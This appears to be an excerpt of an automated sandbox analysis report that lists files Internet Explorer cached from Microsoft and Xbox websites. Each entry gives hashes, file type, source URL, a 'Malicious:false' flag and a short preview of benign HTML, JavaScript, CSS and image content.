                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html> ServerInfo: BY1PPF0A2EAF4A9 2021.04.29.10.43.41 LocVer:0 --> PreprocessInfo: azbldrun:AzBuildW2-Ha13, 2021-04-29T10:39:37.8613138-07:00 - Version: 16,0,29025,2 --> RequestLCID: 1033, Market:EN-US, PrefCountry: US, LangLCID: 1033, LangISO: EN --><html dir="ltr" lang="EN-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><base href="https://login.live.com"/><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=3b41672ebf974f720c2aca5a9e5ca1d8"/>Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript><title>Windows Live ID</title><meta name="robots" content="none" /><meta name="PageID" content=""/><meta name="S
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microsoft-365[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):180214
                                                                                                                                                                                                              Entropy (8bit):5.353368281322592
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:J2HmIRldFPJ9Zm4nzKF5ZH4Kh1LGYhz3jEj9TNfHx7EmI9o/m0RP1UWWTf7FNyn2:J2lRldxLUwY0m0RP1UWWTSHqR
                                                                                                                                                                                                              MD5:1ED37F58D743C9B3C96410FC698C42A2
                                                                                                                                                                                                              SHA1:73E3B14B38D9296D3845F9C39986BEE6C0884E08
                                                                                                                                                                                                              SHA-256:E3313B5DE66086D5709B2EFB6AEAE34E8258BBB8233BC5F2656A8BE1FA0F75D4
                                                                                                                                                                                                              SHA-512:0729BDD9CCADF7D281F7C6340BC0D46F227E50CA052A363436FB11FA6DCA2D047EB185804FEBCDCF0B9278CEBE9A92F634562AA3BDA1430B9C2BAC61C5D85EAF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="de-ch" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7797.2686&quot;,&quot;a&quot;:&quot;b68a7c96-bd76-48c7-a122-28e1d28d4c7b&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odnortheurope, dt: 2018-05-03T20:14:23.4188992Z, bt: 2021-05-07T09:29:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;de-ch&quot;,&quot;l&quot;:&quot;de-ch&quot;,&quot;mu&quot;:&quot;de-ch&quot;,&quot;rp&quot;:&quot;/de-ch/microsoft-365&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title>Microsoft&#160;365 mit Office-Apps | Microsoft
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\navcancl[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2713
                                                                                                                                                                                                              Entropy (8bit):4.1712007174415895
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:r3avxU5hzsIVmVMeLmVMyHf63lboxMCLxvriN6LOAPAnQay78eLx5Tb87nVkEhML:upU0GVeLVGBXvrp4n/1a5TI7Ve/G79KX
                                                                                                                                                                                                              MD5:4BCFE9F8DB04948CDDB5E31FE6A7F984
                                                                                                                                                                                                              SHA1:42464C70FC16F3F361C2419751ACD57D51613CDF
                                                                                                                                                                                                              SHA-256:BEE0439FCF31DE76D6E2D7FD377A24A34AC8763D5BF4114DA5E1663009E24228
                                                                                                                                                                                                              SHA-512:BB0EF3D32310644285F4062AD5F27F30649C04C5A442361A5DBE3672BD8CB585160187070872A31D9F30B70397D81449623510365A371E73BDA580E00EEF0E4E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html>.... <head>.. <link rel="stylesheet" type="text/css" href="res://ieframe.dll/ErrorPageTemplate.css" />.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.... <title>Navigation Canceled</title>.... <script src="res://ieframe.dll/errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="res://ieframe.dll/httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:navCancelInit(); ">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="res://ieframe.dll/info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\newsletter-icon[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1093
                                                                                                                                                                                                              Entropy (8bit):5.378834656577112
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:2dpLATLf3vlbWwmhoAJnTIRL0pdxiWnE0oEzoEroEnn2:chAvf3vlbWwmh5Jy0MWLn3q
                                                                                                                                                                                                              MD5:DA6E674C3855E4C32F43543D0490E2D0
                                                                                                                                                                                                              SHA1:6F6F49CE32BDBA927A4646D19E74BC06BDBEE0A2
                                                                                                                                                                                                              SHA-256:0FE1530B059249BBAED30CA5594D77F442BF7072E4AA39404F921EB281B2926B
                                                                                                                                                                                                              SHA-512:66FFCEA829A8B3738A049E482D9835FB4A92D15B877C48EF5E7C83FE17C278D38301D1272AB3F332FB651E3FD8DCFE9474B329522CB17CD90C0E5CC6AF923F25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/newsletter-icon.svg?version=26094b8a-2cfc-fa19-5dfa-4a6913af6eb5
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 20.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 92 92" style="enable-background:new 0 0 92 92;" xml:space="preserve">.<style type="text/css">...st0{fill:#505050;}.</style>.<g>..<path class="st0" d="M78.2,27.2V16.4H3v48.7c0,5.8,4.7,10.5,10.5,10.5h64.8c5.9,0,10.8-4.8,10.8-10.8V27.2H78.2z M83.6,64.8...c0,3-2.4,5.4-5.4,5.4H13.5c-2.8,0-5.1-2.3-5.1-5.1V21.8h64.5v8.1v2.7v29.6c0,1.5,1.2,2.7,2.7,2.7c1.5,0,2.7-1.2,2.7-2.7V32.6h5.4...L83.6,64.8L83.6,64.8z"/>..<g>...<rect x="13.8" y="27.2" class="st0" width="53.8" height="5.4"/>..</g>..<g>...<rect x="46" y="59.4" class="st0" width="21.5" height="5.4"/>..</g>..<g>...<rect x="46" y="48.7" class="st0" width="21.5" height="5.4"/>..</g>..<g>...<rect x="46" y="37.9" class="st0" width="21.5" height="5.4"/>..</g>..<g>...<path class=
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\oct2017HP[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2588
                                                                                                                                                                                                              Entropy (8bit):4.776836037204935
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XBKa6q67XcB/wP60awnGkaX/wvKkwhAtEKmmj4mmILI0Sskp/RQM/RQUx+OFHSIl:r6PjnGeU01mmjn/Xkly6yocHzji
                                                                                                                                                                                                              MD5:1A70E5D086F6C5909239C177CBED7E78
                                                                                                                                                                                                              SHA1:FDE2795508548202BC72C8F8550EBEA8C96309B8
                                                                                                                                                                                                              SHA-256:AFC62C862464F875B4E31A32E158792085394C2E4F78176F782E85044442637A
                                                                                                                                                                                                              SHA-512:F599307A93FAC8F838C8E9FDE615CBDB2D5704032B17DA4C0D0B38EEE8AEC994BF3F887D7DDAFC523B187A74B454D012B5C649347BF07C3D474F4802B8A90A7D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/home/js/oct2017HP.js
                                                                                                                                                                                                              Preview: var SCROLLTHRESHOLD = .01; ..$(document).ready(function() {. if ($(window).width() >= 1068) { //Should be 1084, not sure why but this is working.. setTimeout(slidingTiles, 1000);. }.window.onresize = function(event) {. if ($(window).width() >= 1068) {. slidingTiles();. }.}..});..function slidingTiles() {. $(".hp-mosaic li.slide").each(function(index) {. var currentElement = $(this);. var visLoc = visibility(currentElement)[1];. var isVisible = currentElement.data("mosaic");. if (isVisible === false && visLoc > SCROLLTHRESHOLD) {. currentElement.css({ opacity: 0.0, visibility: "visible" }).animate({ opacity: 1.0 });. currentElement.css("top", "0px");. currentElement.data("mosaic", "true");. }. $(window).scroll(function() {. var visLoc = visibility(currentElement)[1];. var isVisible = currentElement.data("mosaic");. if (isVisible === false && visLoc > S
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\oneplayeriframe[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4569
                                                                                                                                                                                                              Entropy (8bit):5.028076310140503
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:LC/x2zNBspkzAses94/KnfuxIOASrISQ0ixwUIjOzpR:LC/x2hBspkUses94/KfuxIOAS8IixwXa
                                                                                                                                                                                                              MD5:E7E0151C8481698D4C40846137616EBB
                                                                                                                                                                                                              SHA1:7A75827A9D7A58555CBC7C87E4F3BD241BFBDCB4
                                                                                                                                                                                                              SHA-256:C72AE6657922A1D9D4D0E6AE6232DF5B6666AD59186DFE438C8434881EC6674E
                                                                                                                                                                                                              SHA-512:EA92B39D49F1CBD2653486963C6DA9892C4742059ABB85AFC874AC88A152439CD8887F7773065F842F41C866F26916625323210C5FEFC1E629313C108B5AAA0A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/videoplayer/js/oneplayeriframe.js
                                                                                                                                                                                                              Preview: var MsOnePlayer;(function(n){function i(n,i,r){var u=new t(document.getElementById(n),i);u.onPlayerReady(r)}n.render=i;var t=function(){function n(t,i){var r=this,u;(this.playerDiv=t,this.playerData=i,this.playerReady=!1,this.onPlayerReadyCallbacks=[],this.playerEventListeners=[],this.onMessageReceived=function(t){if(t&&t.data&&t.origin===n.iframeOrigin)try{var i=JSON.parse(t.data);if(!i||i.playerId!==r.playerId)return;i.data&&(r.playPosition=i.data);switch(i.eventName.toLowerCase()){case"playerready":r.playerReady=!0;setTimeout(function(){var n=r.iframeElement.contentDocument.getElementById("primaryArea");n&&n.removeAttribute("role")},1e3);r.doCallback(r.onPlayerReadyCallbacks,r);break;case"postjsllmessage":r.sendTelemetyData(i.data)}r.doCallback(r.playerEventListeners,{name:i.eventName})}catch(u){}},t&&i&&i.metadata&&i.metadata.videoId)&&(n.iframeOrigin[0]==="%"&&(n.iframeOrigin=n.iframeOriginDefault),n.siteName[0]==="%"&&(n.siteName=n.defaultSiteName),this.playerReady=!1,n.playerCou
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\skiptomain[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):120853
                                                                                                                                                                                                              Entropy (8bit):5.160616736076722
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:GV8Utc49kADAKlyvpkILOOQeI4PQ4LqByzOafWLznlLXAiQhnlOc8ywDNEUR9qVc:slyvpkILgCLSz7o/z0
                                                                                                                                                                                                              MD5:2564304E5703DD799E4D53728D9EA985
                                                                                                                                                                                                              SHA1:C94526DD5E7D57DC50682960FB4DE172ABBCF066
                                                                                                                                                                                                              SHA-256:2CF17B735A4C75771EB42F29245F53874B98B8F02FA4C25156772CFB4033CC8C
                                                                                                                                                                                                              SHA-512:37EA3A3726BB55713D3147090F826DEAD43ECFAA66EA75474DB94212A56976BEF0565A6CCC5E74F4FCB2902CE3F2A8EB63A50F2CB26D99D5EB7FDED33A055B7B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/js/MWF_20200416_22921869/alert/areaheading/autosuggest/channelplacement/channelplacementitem/contentplacement/contentplacementitem/contentrichblock/dialog/flipper/flyout/glyph/heading/highlightfeature/hyperlinkgroup/image/list/pagebehaviors/singleslidecarousel/skiptomain?apiVersion=1.0
                                                                                                                                                                                                              Preview: define("componentFactory",["require","exports","htmlExtensions","utility","stringExtensions","pageBehaviors"],function(n,t,i,r,u,f){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var e=function(){function n(){}return n.create=function(t){for(var i,r=0,u=t;r<u.length;r++){if(i=u[r],!i.c&&!i.component)throw"factoryInput should has either component or c to tell the factory what component to create.Eg.ComponentFactory.create([{ c: Carousel] or ComponentFactory.create([component: Carousel]))";n.createComponent(i.component||i.c,i)}},n.createComponent=function(t,r){if(t){var o=r&&r.eventToBind?r.eventToBind:"",f=r&&r.selector?r.selector:t.selector,s=r&&r.context?r.context:null,u=[],e=function(n,f,e){var a,c,l,o,h;for(a=r.elements?r.elements:f?i.selectElementsT(f,s):[document.body],c=0,l=a;c<l.length;c++)o=l[c],o?(o.mwfInstances||(o.mwfInstances={}),o.mwfInstances[n]?u.push(o.mwfInstances[n]):(h=new t(o,e),(!h.isObserving||h.isObserving())&&(o.mwfInstances[n]=h,u.push(h)))):cons
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\slider[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):55908
                                                                                                                                                                                                              Entropy (8bit):5.215237835798686
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wc49k3pCDAKCV8UyGPyvpiLNlUYm8nXJci7GN8MtcxysT6J+P5YOGTcoaLBrTZEb:wc49kADAKCV8UJyvponmeyqx1Vt2
                                                                                                                                                                                                              MD5:2F6366034C0F2A98F49285E08B9E5746
                                                                                                                                                                                                              SHA1:0D09B526F94A2BC32B696185C8C642024FB260F8
                                                                                                                                                                                                              SHA-256:0E7897D42ACD02D12488539EC5D70BE2CE90A0815578A53BCC101486AED848DD
                                                                                                                                                                                                              SHA-512:3F3E8C80080D31AC1BBE831700DF52393FE28E269B85D03097164A62FE2F014C75CFBD3121501EC1B7DC9FB86F70E732855EC58836B5F17AD727208B25729038
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/js/MWF_20210208_31270267/button/glyph/heading/image/list/pagebehaviors/selectmenu/slider?apiVersion=1.0
                                                                                                                                                                                                              Preview: define("observableComponent",["require","exports","htmlExtensions"],function(n,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var r=function(){function n(t,i){i===void 0&&(i=null);this.element=t;this.ignoreNextDOMChange=!1;this.observing=!1;n.shouldInitializeAsClass(t,i)&&this.setObserver()}return n.prototype.detach=function(){this.unObserve();this.teardown()},n.prototype.isObserving=function(){return this.observing},n.prototype.unObserve=function(){this.observing=!1;this.modernObserver&&this.modernObserver.disconnect();i.removeEvent(this.element,i.eventTypes.DOMNodeInserted,this.obsoleteNodeInsertedEventHander);i.removeEvent(this.element,i.eventTypes.DOMNodeRemoved,this.obsoleteNodeRemovedEventHandler)},n.prototype.setObserver=function(){this.observing=!0;typeof n.mutationObserver!="undefined"?this.observeModern():"MutationEvent"in window&&this.observeObsolete()},n.prototype.observeModern=function(){var t=this,i=function(n){t.onModernMutations(n)};this.modernObserv
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\social[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):173551
                                                                                                                                                                                                              Entropy (8bit):5.164386444155754
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:GV8Utc49kADAKlyvpktwDNEUR9qVaMNk+Q4EMQgKgaeX81fqnmNKqqBgzhe9WOUS:slyvpk2NZ0DAF7puOx8w2tzj
                                                                                                                                                                                                              MD5:82E6D4891749B2C2DD1FADCFECD9DB78
                                                                                                                                                                                                              SHA1:1843A7C19B9016440246E44E491F3144D27BDF84
                                                                                                                                                                                                              SHA-256:EE307E4BB59265705C3A21895C238C85A693A92F48F2A722325910F311C8E78F
                                                                                                                                                                                                              SHA-512:B5A5C9B7E29A2A5B939CFF11BEEA298357FF8CDB6CB73B7C5826BF67AAD45DD0CAD3D6C65002BBF87EC7B8F3D02BBBC1E3573E3EEDC7F16409F319B450A8A92C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/js/MWF_20210208_31270267/alert/ambientvideo/areaheading/autosuggest/button/calltoaction/dialog/divider/feature/glyph/heading/hero/heroitem/hyperlinkgroup/image/imageintro/list/logo/mosaic/mosaicplacement/multislidecarousel/pagebehaviors/rating/skiptomain/slider/social?apiVersion=1.0
                                                                                                                                                                                                              Preview: define("componentFactory",["require","exports","htmlExtensions","utility","stringExtensions","pageBehaviors"],function(n,t,i,r,u,f){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var e=function(){function n(){}return n.create=function(t){for(var i,r=0,u=t;r<u.length;r++){if(i=u[r],!i.c&&!i.component)throw"factoryInput should has either component or c to tell the factory what component to create.Eg.ComponentFactory.create([{ c: Carousel] or ComponentFactory.create([component: Carousel]))";n.createComponent(i.component||i.c,i)}},n.createComponent=function(t,r){if(t){var o=r&&r.eventToBind?r.eventToBind:"",f=r&&r.selector?r.selector:t.selector,s=r&&r.context?r.context:null,u=[],e=function(n,f,e){var a,c,l,o,h;for(a=r.elements?r.elements:f?i.selectElementsT(f,s):[document.body],c=0,l=a;c<l.length;c++)o=l[c],o?(o.mwfInstances||(o.mwfInstances={}),o.mwfInstances[n]?u.push(o.mwfInstances[n]):(h=new t(o,e),(!h.isObserving||h.isObserving())&&(o.mwfInstances[n]=h,u.push(h)))):cons
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\style[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):744174
                                                                                                                                                                                                              Entropy (8bit):5.098372773702807
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:lh1lPZ9tsSWXI5rVYGHJuDwQQr8Hf6yq+KxnnHCdCXfKEEnoIPE/ojBh3Us+BjjS:0Dwaq+Kxnbkd
                                                                                                                                                                                                              MD5:7DFBA606236D1D0B20A0370043033B16
                                                                                                                                                                                                              SHA1:A639029E76ECB52F2CA005DB085C6FC5269E31A4
                                                                                                                                                                                                              SHA-256:5F519D8272DE8F00F04B2F399504102236D793C4EB36050021FFE6C51E21A5C5
                                                                                                                                                                                                              SHA-512:A55B2C0E44C711F4C50B780B95B84D62E056F27DC800149658537BE16320EE948707E2F055D078B2DE034AE199013A8612EE0B53CBC822DD1AA731BD71A84803
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSStyles/style.csx?k=a74b3be4-1aa9-cec3-a446-86df5de5b1d9_5db8aa42-94fc-25e1-b3cb-4c10fc9b3365_19eb7aac-f19d-5b0a-2597-917ab6f56948_6907ca6c-47d0-7fb2-f172-c697ac3fa1d4_c2f71a82-22a3-f26a-5030-ff5ef0258ba5_a681ceee-a34b-e130-8d81-b18ed7ae311c_9364d263-04e2-fa93-295f-ac95deef1b9e_f2c0a7de-c8b4-9ffd-3da8-507c03656f45_1355fc4b-ebb6-3206-623c-1d0bfa198078_4e47a659-c850-3b0e-9619-bf3f3883383f_38c4f8a1-9126-1ac0-fe7c-a6ce511e4d5d_a59217af-ef9a-e7a9-5d2d-3e7c29ec8c74_cadda335-6bb7-dd27-b21c-207becff7f0e_6c374194-c20d-b1fb-c660-cb265575e9f8_8537e4c1-e0c2-217e-35c8-368ff8695452_3a5d0f03-92af-f68f-4d54-9345fd0c450b_101e2959-bef8-bef3-9753-ec50a2e21e47_22f531fa-1ca1-1450-f51f-0ced3605391f_83f79b5f-072c-caff-6be3-fc1c19e6fc7d_38913389-fea5-7880-c2c9-8456eb4bc8b3_96e658dc-47b6-244e-2597-042a5f8f810c_9ec9714d-916b-3af1-3b2b-1319816e27f2_077fbb87-618f-dfeb-9d82-070977d8501e_fe5653f3-5634-2b70-6e35-7877f94f84bb_443818fe-bc64-cfef-48f0-a8818b7f445d_6df37af9-22e9-89f4-4df9-6254b9c36a43_a5c2a06f-7ed2-5a74-5ba9-483951164242_d21bd579-3ea5-f74c-45ef-69c9d1f07c47
                                                                                                                                                                                                              Preview: /* Padding / Margings from 1 to 120 pixesl with 5x */..padding-top-1 {. padding-top: 1px;.}..padding-bottom-1 {. padding-bottom: 1px;.}..padding-left-1 {. padding-left: 1px;.}.padding-right-1 {. padding-right: 1px;.}..margin-top-1 {. margin-top: 1px;.}..margin-bottom-1 {. margin-bottom: 1px;.}..margin-left-1 {. margin-left: 1px;.}..margin-right-1 {. margin-right: 1px;.}..padding-top-5 {. padding-top: 5px;.}..padding-bottom-5 {. padding-bottom: 5px;.}..padding-left-5 {. padding-left: 5px;.}..padding-right-5 {. padding-right: 5px;.}..margin-top-5 {. margin-top: 5px;.}..margin-bottom-5 {. margin-bottom: 5px;.}..margin-left-5 {. margin-left: 5px;.}..margin-right-5 {. margin-right: 5px;.}..padding-top-10 {. padding-top: 10px;.}..padding-bottom-10 {. padding-bottom: 10px;.}..padding-left-10 {. padding-left: 10px;.}..padding-right-10 {. padding-right: 10px;.}..margin-top-10 {. margin-top: 10px;.}..margin-bottom-10 {. margin-bottom: 10px;.}..margin-left-10 {. margin-left
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\t[1].gif
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                              Entropy (8bit):3.16293190511019
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CUmExltxlHh/:Jb/
                                                                                                                                                                                                              MD5:FC94FB0C3ED8A8F909DBC7630A0987FF
                                                                                                                                                                                                              SHA1:56D45F8A17F5078A20AF9962C992CA4678450765
                                                                                                                                                                                                              SHA-256:2DFE28CBDB83F01C940DE6A88AB86200154FD772D568035AC568664E52068363
                                                                                                                                                                                                              SHA-512:C87BF81FD70CF6434CA3A6C05AD6E9BD3F1D96F77DDDAD8D45EE043B126B2CB07A5CF23B4137B9D8462CD8A9ADF2B463AB6DE2B38C93DB72D2D511CA60E3B57E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\table[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):327638
                                                                                                                                                                                                              Entropy (8bit):4.960817468914012
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:vzyP5kTP3bI0tfYqQ0xtLfj4ZDa813giY8R1j35Ap7zzN1n1JKfNkyvFSH7PAbOp:2wQ+7P3
                                                                                                                                                                                                              MD5:8995A3E562F5632599F4CEAC91A326F7
                                                                                                                                                                                                              SHA1:0BA9D64E7D90A64F9D016CAA2EC4A431FDB69E2A
                                                                                                                                                                                                              SHA-256:B80917E35879795D8DA6C365EE76A575D5C89BB31CD886CAD98E725BCE8D00F4
                                                                                                                                                                                                              SHA-512:D1AA6CB1AED777D1BDEDF8608322086581312F0AE30EFA8001E733AD4EB45A694AC8203DAAFED947683211387FAC2F7E791DB499956F3E68BB308392B1C055B5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/css/MWF_20210208_31270267/west-european/default/actiontoggle/areaheading/button/calltoaction/combo/contentplacement/contentrichblock/dialog/divider/drawer/glyph/heading/linknavigation/list/multislidecarousel/rating/slider/sticky/table?apiVersion=1.0&include_base=false
                                                                                                                                                                                                              Preview: a.c-call-to-action,button.c-call-to-action{font-size:15px;padding:10px 20px 6px 22px;position:relative;border:2px solid transparent;outline:1px solid transparent;outline-offset:-3px;max-width:100%;display:inline-block;overflow:hidden;color:#fff;font-weight:600;text-align:center;text-decoration:none;letter-spacing:0;line-height:1.3;white-space:nowrap;transition:all 200ms ease-in-out;box-shadow:0 4px 8px 0 transparent;background:#0067b8}@media screen and (-ms-high-contrast:active){a.c-call-to-action,button.c-call-to-action{border-color:window !important;outline-color:window}}a.c-call-to-action:focus,button.c-call-to-action:focus{border-color:#000;outline-color:rgba(255,255,255,.6)}@media screen and (-ms-high-contrast:active){a.c-call-to-action:focus,button.c-call-to-action:focus{border-color:windowText !important}}.theme-light a.c-call-to-action:focus,.theme-dark .theme-light a.c-call-to-action:focus,.theme-light button.c-call-to-action:focus,.theme-dark .theme-light button.c-call-to-act
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\table[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):156737
                                                                                                                                                                                                              Entropy (8bit):5.125420604050768
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:+c49kADAKCV8UJyvpoKqqCULLMv2OOwDNEUR9qVaMNk+Q4EMQgKgaeX81f1FOrbm:awyvpoZRpF/XhtzHm2
                                                                                                                                                                                                              MD5:94EEC61E1436CFDCF0E22BD968DCA76B
                                                                                                                                                                                                              SHA1:C6B78ABF0C12F664E42945ECD0CC7FD96DF09745
                                                                                                                                                                                                              SHA-256:D09108BCD4DD091E671F86C85B98614BD5AC4583B71FCD3B37C40B3DF15423C7
                                                                                                                                                                                                              SHA-512:5A7329FB9D29B2B88DBC966CE7E8C1A618BFFFADE7D87DF81118E76750CF073518ABDD7047A6274864ECAFABB3411A44E0CE0DA1D9DC2364156BA15D6B911521
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/js/MWF_20210208_31270267/actiontoggle/alert/areaheading/autosuggest/button/calltoaction/combo/contentplacement/contentrichblock/dialog/divider/drawer/glyph/heading/image/linknavigation/list/multislidecarousel/pagebehaviors/progress/rating/select/selectmenu/skiptomain/slider/social/sticky/table?apiVersion=1.0
